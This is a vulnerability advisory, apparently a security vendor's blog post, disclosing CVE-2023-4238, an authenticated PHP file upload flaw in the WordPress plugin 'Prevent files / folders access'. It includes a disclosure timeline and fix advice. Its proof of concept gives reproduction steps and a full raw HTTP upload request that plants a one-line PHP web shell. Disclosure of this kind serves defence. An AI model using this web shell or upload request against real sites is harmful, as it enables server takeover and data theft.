A severe security loophole has come to light in the Prevent files / folders access plugin, triggering concerns over the safety of WordPress websites. This vulnerability, tracked as CVE-2023-4238, opens the door to remote code execution through file uploads. Our testing revealed a startling scenario: an attacker can potentially upload a PHP file to the private directory at /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
.
The plugin’s inclusion of a function for privilege elevation is noteworthy. If an attacker obtains < Admin privileges, they could exploit ordinary users to facilitate this unauthorized upload.
Main info:
CVE | CVE-2023-4238 |
Plugin | Prevent files / folders access |
Critical | Very High |
Publicly Published | August 31, 2023 |
Last Updated | August 31, 2023 |
Researcher | Dmtirii Ignatyev |
OWASP TOP-10 | A05: Security Misconfiguration |
PoC | Yes |
Exploit | Will be later |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4238 https://wpscan.com/vulnerability/53816136-4b1a-4b7d-b73b-08a90c2a638f |
Plugin Security Certification by CleanTalk |
Timeline
July 13, 2023 | Plugin testing and vulnerability detection in the Prevent files / folders access plugin have been completed |
July 13, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
August 27, 2023 | The author has released a fix update |
August 31, 2023 | Registered CVE-2023-4238 |
Discovery of the Vulnerability
During our meticulous examination of the plugin, we identified a critical flaw that exposes websites to remote code execution. This vulnerability allows an attacker to upload malicious PHP files to a specific directory, providing a gateway for executing arbitrary commands on the target system.
Understanding of Remote Code Execution attack’s
Remote Code Execution (RCE) is a sophisticated cyber attack that poses significant threats to the security of software applications, web servers, and online platforms. This type of attack enables malicious actors to execute arbitrary code on a target system, often leading to a complete compromise of the system’s functionality and data.
How Remote Code Execution Works:
- Vulnerability Exploitation: RCE attacks typically exploit vulnerabilities in an application’s code, often resulting from poor input validation, inadequate user authentication, or insecure configurations. Attackers seek ways to inject their own malicious code into the target system.
- Command Execution: Once the attacker succeeds in injecting malicious code, they can execute arbitrary commands on the target system. These commands might include shell commands, operating system functions, or other actions that can compromise the system’s security.
- Unauthorized Access: RCE allows attackers to gain unauthorized access to the server environment, enabling them to manipulate files, databases, and other resources. This unauthorized access can result in data breaches, data loss, and unauthorized control of the system.
Exploiting the Remote Code Execution
In the context of the Prevent files / folders access plugin, an attacker can exploit the lack of proper validation and restrictions on file uploads. By injecting malicious PHP code into a file, they can upload it to the private directory. Upon execution, this file can trigger unauthorized commands, thereby compromising the entire web application.
POC:
1) Need to go to /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
2) Then upload a file with the php extension
3) Follow the link http://your_host/wordpress/wp-content/uploads/protectedfiles/{filename}.php
POC request:
POST /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory HTTP/1.1
Host: your_host
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_host/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
Content-Type: multipart/form-data; boundary=—————————1997636327839669212858654260
Content-Length: 748
Origin: http://your_host
Connection: close
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C778d0436fcf72095251ba6a1f0020fe28af9d706771d93c24bc4fdd5e96ab3c0; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C5b4086f33c562500a9c62e1028af758fe8630a9991847cf93ff7a1265c9d9777; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome; wp-settings-time-1=1689308788
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
—————————–1997636327839669212858654260
Content-Disposition: form-data; name=”mo_media_restriction_file_upload_field”
cff450153b
—————————–1997636327839669212858654260
Content-Disposition: form-data; name=”_wp_http_referer”
/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
—————————–1997636327839669212858654260
Content-Disposition: form-data; name=”fileToUpload”; filename=”cmd.php”
Content-Type: application/x-php
<?php system($_GET[‘cmd’]); ?>
—————————–1997636327839669212858654260
Content-Disposition: form-data; name=”option”
mo_media_restriction_file_upload
—————————–1997636327839669212858654260–
Potential Risks and Real-World Impact
The gravity of this vulnerability cannot be understated. An attacker who successfully leverages this RCE vulnerability gains the ability to execute operating system commands, potentially leading to the complete compromise of the web application, data theft, and unauthorized control of the server environment.
- Data Breaches: Attackers can exfiltrate sensitive data from compromised systems. This might include personal information, financial data, proprietary business information, and more.
- System Compromise: RCE attacks can lead to complete control of the target system. Attackers can modify files, install malware, and even escalate their privileges to gain control over the entire server.
- Malicious Payload: Attackers can deliver payloads that create backdoors or install malware, allowing them to maintain persistent access to the compromised system even after the initial attack.
Recommendations for Improved Security
To mitigate the risks associated with CVE-2023-4238 and enhance overall security, we strongly recommend the following measures:
- Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for RCE.
- Input Validation: Thoroughly validate and sanitize all user inputs to prevent injection attacks and unauthorized code execution.
- Secure Coding Practices: Developers should follow secure coding practices, use proper input validation, avoid executing user-supplied code, and implement principle of least privilege.
- Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent RCE attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
- User Education: Educate users about the risks of executing code from untrusted sources and encourage them to avoid opening suspicious emails or downloading files from unknown sources.
By addressing the RCE vulnerability in the Prevent files / folders access plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their web applications.
#WordPressSecurity #RemoteCodeExecution #WebsiteSafety #StayProtected #VeryCriticalVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii i.
If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.
Leave a Reply